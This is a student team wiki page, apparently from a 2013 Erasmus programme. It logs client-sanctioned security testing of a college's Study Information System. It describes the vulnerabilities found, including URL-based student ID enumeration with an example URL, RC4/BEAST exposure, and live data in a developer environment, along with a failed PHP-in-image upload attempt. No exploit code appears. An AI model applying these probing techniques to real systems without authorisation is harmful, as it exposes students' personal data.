==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62409</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62409"/>
		<updated>2013-04-05T08:36:01Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Mika Salmela */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
